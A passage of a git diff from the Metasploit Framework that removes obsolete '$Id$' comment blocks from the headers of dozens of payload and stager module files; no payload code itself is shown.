b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 51867ce76a..35ef212a7f 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index 727934ec3b..587d27544d 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb index 203ddada59..9f6db0d773 100644 --- a/modules/payloads/singles/php/bind_perl_ipv6.rb +++ b/modules/payloads/singles/php/bind_perl_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index 05a6cfb67d..458bb44c9b 100644 --- a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb index 7f8c8a3f01..29a9146a61 100644 --- a/modules/payloads/singles/php/bind_php_ipv6.rb +++ b/modules/payloads/singles/php/bind_php_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 7c8430769f..0eac8185b1 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 313332e92e..1b43f391d9 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index 58a61aee6a..e5ed71d9d4 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index 75688bdf78..39b4a08f10 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index 5fae8bcbea..94eb491163 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index ba3c7fb083..2c0be219be 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index 5aab5f3a84..d5edee3391 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index 3d361678b6..fe5ebc4ea2 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 1e5a384995..6c928723c1 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index 9218fc75a2..11c4db74c8 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index fcc52be04a..52f9012a9a 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index 902b13812c..e497335804 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index 6ae32bb7ab..5a37c0a8e8 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index 7139491a44..6111432366 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index f95350f237..c3e1a29abe 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 416d8aa9a9..fdd4bb3c6d 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index 860dc6aad2..d50f190d8f 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index fff67d8c5b..7f30e51876 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb index fbaae49c2b..0356ea4d89 100644 --- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb index e38dccda52..57fc24b0fb 100644 --- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index 2cbf8ac1a1..5c4166ba7d 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 3d50926eca..81d15d37ea 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index 2ab9e39974..fe7ec5efa2 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb index c2fac0b282..5f872a1d26 100644 --- a/modules/payloads/singles/windows/speak_pwned.rb +++ b/modules/payloads/singles/windows/speak_pwned.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index 78910cbbc4..d81438b4b3 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb index 5129d1e089..c3d296e34d 100644 --- a/modules/payloads/singles/windows/x64/loadlibrary.rb +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index fc3f777b03..71f8d7590a 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index e0bbdb258e..2a6355e102 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index 9f6edc9f56..6efad317e5 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index a505de6a99..e086f3e4cb 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index dd59f206ee..cda934bcbc 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index cc2bbfcf61..8dcd032031 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index d7a8582032..307591c9d6 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 8b2f096a09..9cf2ccc2ff 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index efa641defc..fd51fa7db8 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index 84a06fe4f9..ce670274f3 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index b5cd04548e..e0868e8a8e 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index 896cccf489..eeb91f4613 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 809ae34114..87e2c90e4e 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index 54d91f05ef..490a260b36 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index d7f7c3fa8e..b13ea45308 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index c45ffaceb5..f5d9feb61c 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index d91e3e554b..a947b5c3b9 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 9561966bed..ab0e44046d 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index aa33fdaed1..fa4ae20e1f 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index b6e7e1f1a5..fd79028bab 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 23f6188d1b..3e7aa7e599 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 54aa746ccd..a89f8b611d 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index f6c86c0d4c..3d14848544 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index 190747fa61..a699bed676 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index 9a03ce2cfe..440d642d97 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 4fcdc72f98..7b157595ce 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index 9fb8abf6c0..ad46d8d8c5 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 155ceab391..574071e770 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 3e9e24862e..6dfd8234d3 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index bff4834aba..e739859f40 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index f2b5c65c65..e07bd47c46 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index 859029e0d7..e90b0ecdac 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index e6b8632d85..751e71fd85 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 1d36fc269f..88aaff889d 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 4810def391..30f9e5a36e 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index c26415a868..6fa8536470 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 0ce7bcbd50..5b430bb625 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index bf3acdf39c..ce8b4f67e1 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index e592a24e24..92f0392c47 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb index 2fd8a9fd1a..55bf4e0721 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb @@ 